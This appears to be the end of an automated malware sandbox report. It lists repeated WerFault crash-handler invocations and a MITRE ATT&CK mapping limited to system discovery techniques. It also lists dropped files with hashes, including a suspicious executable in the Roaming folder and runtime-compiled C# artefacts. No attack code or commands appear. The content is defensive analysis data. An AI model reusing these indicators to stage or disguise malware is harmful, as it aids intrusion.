C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4668 -ip 4668
1⤵
PID:2828

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 4668 -ip 4668
1⤵
PID:1416

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 4668 -ip 4668
1⤵
PID:3936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 4668 -ip 4668
1⤵
PID:4072

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 4668 -ip 4668
1⤵
PID:3604

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 4668 -ip 4668
1⤵
PID:4524

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 4668 -ip 4668
1⤵
PID:640

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 4668 -ip 4668
1⤵
PID:2236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 4668 -ip 4668
1⤵
PID:2400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 4668 -ip 4668
1⤵
PID:3892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 756 -p 4668 -ip 4668
1⤵
PID:2892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 756 -p 4668 -ip 4668
1⤵
PID:4972

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 768 -p 4668 -ip 4668
1⤵
PID:440

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 752 -p 4668 -ip 4668
1⤵
PID:3404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 764 -p 4668 -ip 4668
1⤵
PID:1392

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 784 -p 4668 -ip 4668
1⤵
PID:2628

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 756 -p 4668 -ip 4668
1⤵
PID:3000

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 792 -p 4668 -ip 4668
1⤵
PID:3652

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 776 -p 4668 -ip 4668
1⤵
PID:4264

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 752 -p 4668 -ip 4668
1⤵
PID:764

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 816 -p 4668 -ip 4668
1⤵
PID:1580

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 844 -p 4668 -ip 4668
1⤵
PID:4888

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 840 -p 4668 -ip 4668
1⤵
PID:4876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 856 -p 4668 -ip 4668
1⤵
PID:1292

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 788 -p 4668 -ip 4668
1⤵
PID:3600

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 868 -p 4668 -ip 4668
1⤵
PID:4380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 868 -p 4668 -ip 4668
1⤵
PID:3828

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 884 -p 4668 -ip 4668
1⤵
PID:1272

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 892 -p 4668 -ip 4668
1⤵
PID:1564

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 900 -p 4668 -ip 4668
1⤵
PID:3816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 824 -p 4668 -ip 4668
1⤵
PID:532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 884 -p 4668 -ip 4668
1⤵
PID:2684

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 884 -p 4668 -ip 4668
1⤵
PID:348

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 824 -p 4668 -ip 4668
1⤵
PID:4148

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 888 -p 4668 -ip 4668
1⤵
PID:2092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 836 -p 4668 -ip 4668
1⤵
PID:4040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 888 -p 4668 -ip 4668
1⤵
PID:4568

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 932 -p 4668 -ip 4668
1⤵
PID:3852

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 916 -p 4668 -ip 4668
1⤵
PID:3480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 960 -p 4668 -ip 4668
1⤵
PID:3640

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 964 -p 4668 -ip 4668
1⤵
PID:3644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 980 -p 4668 -ip 4668
1⤵
PID:3112

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 984 -p 4668 -ip 4668
1⤵
PID:1812

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 968 -p 4668 -ip 4668
1⤵
PID:4264

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 988 -p 4668 -ip 4668
1⤵
PID:4204

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 972 -p 4668 -ip 4668
1⤵
PID:4404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 988 -p 4668 -ip 4668
1⤵
PID:2388

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 1004 -p 4668 -ip 4668
1⤵
PID:3504

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 968 -p 4668 -ip 4668
1⤵
PID:3612

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 1020 -p 4668 -ip 4668
1⤵
PID:3188

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 1008 -p 4668 -ip 4668
1⤵
PID:920

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4668 -ip 4668
1⤵
PID:3828

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 992 -p 4668 -ip 4668
1⤵
PID:3524

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 912 -p 4668 -ip 4668
1⤵
PID:2396

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES9BE2.tmp

Filesize
1KB

MD5
d3d9f000bd95b54171c16ee05f05355b

SHA1
3de4447a64174bf1c49de8bd7a190286d9734677

SHA256
faeb2a6bdd18f123ab6f9f7790c5d5cccd48095db876b5cd3fb200ef93157418

SHA512
0876dec0c347eb9e733a803bc00d59a62ca848732461bd155f7c488fda91b30a6fdb3d56fd4d8d430d6c747700b5e9cc5cdf9cfa8dc12b8579651dc56750c415

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_iw5ngbnu.dou.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\wbs2a0es\wbs2a0es.dll

Filesize
3KB

MD5
28900e93e199f8fa70375dc6e26474bb

SHA1
7b8bb909bcf0fc684851c45dd31d27b78c538904

SHA256
bfcf1417fc86da748537204d91d01dba5843e98ba6b06d273c0818a14505dd2f

SHA512
de2a5d433283e681c3a857fd6a204a0457654eb487daa33f50e781ee99617804cb4d4a8f09d9fb6d2069aeabe2c6774edafd4172ca01d25aa4220ac3c033207e

Download Submit
C:\Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe

Filesize
530KB

MD5
c6b0fba610732719435d9621878bc605

SHA1
789afce0b2016029215db7cca0ce7c4acfa54b4c

SHA256
ce59b68d157e34b9608b9535441963aaef11068cae3b75a3646238f25b74b92d

SHA512
5d67d7e0fec12d7f03053d809f614263c6af7b3d54ed794632ee9024895b3c607ebcabd81a2d6202d280968c4df1ef9bd3699675416a67936345f8622c206933

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wbs2a0es\CSCABE1F43461F145418DE97A6446B939C1.TMP

Filesize
652B

MD5
7a465140e3111ae15a16c53ad58e093e

SHA1
5915fc866a8a18cc311414ff6aabffc2afac1d28

SHA256
8dac676a75ff123329e79641c4625f58286a2cfe8170ceeef2022a490750d329

SHA512
4c0d86706d14f41563b6519b60ce2ac3ac7d228b7d34541984bc713e7da3b1fa83b87660284cd7c572952ac1175783020e8bed7b2f1706b02f85375d79e3b318

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wbs2a0es\wbs2a0es.0.cs

Filesize
493B

MD5
00df4ae943d803cb15795b1fd55ead94

SHA1
fc1509b646d150cc4d1c2d92cf772be4af67716b

SHA256
e8d13d324b35fc23a6729caa22125343bfebb09476a9334e93e8c1804ce6314a

SHA512
e40826e83f25a3be3fdf26c1d5a667d0eb40d53d3f0fe46f8cc395152cd1eb46b98e193fc3a3f06b6cefadbed030d2a90a5575c1d235228d53d5f152d2e85796

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wbs2a0es\wbs2a0es.cmdline

Filesize
369B

MD5
ec7fee2fe196d0fc514eaf95876715db

SHA1
2d23c54dc8e154bb341e34b8613c725f679abfb0

SHA256
58fc7251c5f18451ac624ea861be126b59993ba5ffba1d023b2f3bf126fcdfee

SHA512
747e1f8ce7b01e17ff0902b4160dab46bfc136d4aa62189bfc6305c487059717a26b9b323a9f58cbe52e45a3c2ee3f76c822c647e4aa3a134aeb19d4dacc13b2

Download Submit
memory/4668-83-0x0000000000400000-0x000000000048C000-memory.dmp

Filesize
560KB

Download
memory/4668-81-0x0000000000400000-0x000000000048C000-memory.dmp

Filesize
560KB

Download
memory/4668-80-0x0000000000400000-0x000000000048C000-memory.dmp

Filesize
560KB

Download
memory/4668-79-0x0000000000400000-0x000000000048C000-memory.dmp

Filesize
560KB

Download
memory/4668-78-0x0000000000400000-0x000000000048C000-memory.dmp

Filesize
560KB

Download
memory/4668-77-0x0000000000400000-0x000000000048C000-memory.dmp

Filesize
560KB

Download
memory/4668-76-0x0000000000400000-0x000000000048C000-memory.dmp

Filesize
560KB

Download
memory/4668-75-0x0000000000400000-0x000000000048C000-memory.dmp

Filesize
560KB

Download
memory/4668-82-0x0000000000400000-0x000000000048C000-memory.dmp

Filesize
560KB

Download
memory/4668-84-0x0000000000400000-0x000000000048C000-memory.dmp

Filesize
560KB

Download
memory/4668-85-0x0000000000400000-0x000000000048C000-memory.dmp

Filesize
560KB

Download
memory/4668-86-0x0000000000400000-0x000000000048C000-memory.dmp

Filesize
560KB

Download
memory/4668-87-0x0000000000400000-0x000000000048C000-memory.dmp

Filesize
560KB

Download
memory/4948-22-0x0000000071350000-0x0000000071B00000-memory.dmp

Filesize
7.7MB

Download
memory/4948-66-0x0000000071350000-0x0000000071B00000-memory.dmp

Filesize
7.7MB

Download
memory/4948-39-0x0000000007940000-0x000000000794A000-memory.dmp

Filesize
40KB

Download
memory/4948-40-0x0000000007B60000-0x0000000007BF6000-memory.dmp

Filesize
600KB

Download
memory/4948-41-0x0000000007A90000-0x0000000007AA1000-memory.dmp

Filesize
68KB

Download
memory/4948-42-0x0000000007B10000-0x0000000007B1E000-memory.dmp

Filesize
56KB

Download
memory/4948-43-0x0000000007B20000-0x0000000007B34000-memory.dmp

Filesize
80KB

Download
memory/4948-44-0x0000000007C00000-0x0000000007C1A000-memory.dmp

Filesize
104KB

Download
memory/4948-45-0x0000000007B50000-0x0000000007B58000-memory.dmp

Filesize
32KB

Download
memory/4948-38-0x00000000078E0000-0x00000000078FA000-memory.dmp

Filesize
104KB

Download
memory/4948-36-0x0000000007F60000-0x00000000085DA000-memory.dmp

Filesize
6.5MB

Download
memory/4948-35-0x0000000071350000-0x0000000071B00000-memory.dmp

Filesize
7.7MB

Download
memory/4948-34-0x0000000007830000-0x00000000078D3000-memory.dmp

Filesize
652KB

Download
memory/4948-33-0x0000000007560000-0x000000000757E000-memory.dmp

Filesize
120KB

Download
memory/4948-58-0x0000000007B50000-0x0000000007B58000-memory.dmp

Filesize
32KB

Download
memory/4948-60-0x000000007135E000-0x000000007135F000-memory.dmp

Filesize
4KB

Download
memory/4948-61-0x0000000071350000-0x0000000071B00000-memory.dmp

Filesize
7.7MB

Download
memory/4948-37-0x0000000071350000-0x0000000071B00000-memory.dmp

Filesize
7.7MB

Download
memory/4948-23-0x000000006DD80000-0x000000006E0D4000-memory.dmp

Filesize
3.3MB

Download
memory/4948-74-0x0000000071350000-0x0000000071B00000-memory.dmp

Filesize
7.7MB

Download
memory/4948-21-0x000000006DC10000-0x000000006DC5C000-memory.dmp

Filesize
304KB

Download
memory/4948-0-0x000000007135E000-0x000000007135F000-memory.dmp

Filesize
4KB

Download
memory/4948-20-0x0000000006B70000-0x0000000006BA2000-memory.dmp

Filesize
200KB

Download
memory/4948-19-0x0000000006620000-0x000000000666C000-memory.dmp

Filesize
304KB

Download
memory/4948-18-0x0000000006580000-0x000000000659E000-memory.dmp

Filesize
120KB

Download
memory/4948-17-0x00000000060A0000-0x00000000063F4000-memory.dmp

Filesize
3.3MB

Download
memory/4948-7-0x0000000005E30000-0x0000000005E96000-memory.dmp

Filesize
408KB

Download
memory/4948-6-0x0000000005D50000-0x0000000005DB6000-memory.dmp

Filesize
408KB

Download
memory/4948-5-0x00000000055B0000-0x00000000055D2000-memory.dmp

Filesize
136KB

Download
memory/4948-4-0x0000000071350000-0x0000000071B00000-memory.dmp

Filesize
7.7MB

Download
memory/4948-3-0x0000000071350000-0x0000000071B00000-memory.dmp

Filesize
7.7MB

Download
memory/4948-2-0x00000000056B0000-0x0000000005CD8000-memory.dmp

Filesize
6.2MB

Download
memory/4948-1-0x0000000002FB0000-0x0000000002FE6000-memory.dmp

Filesize
216KB

Download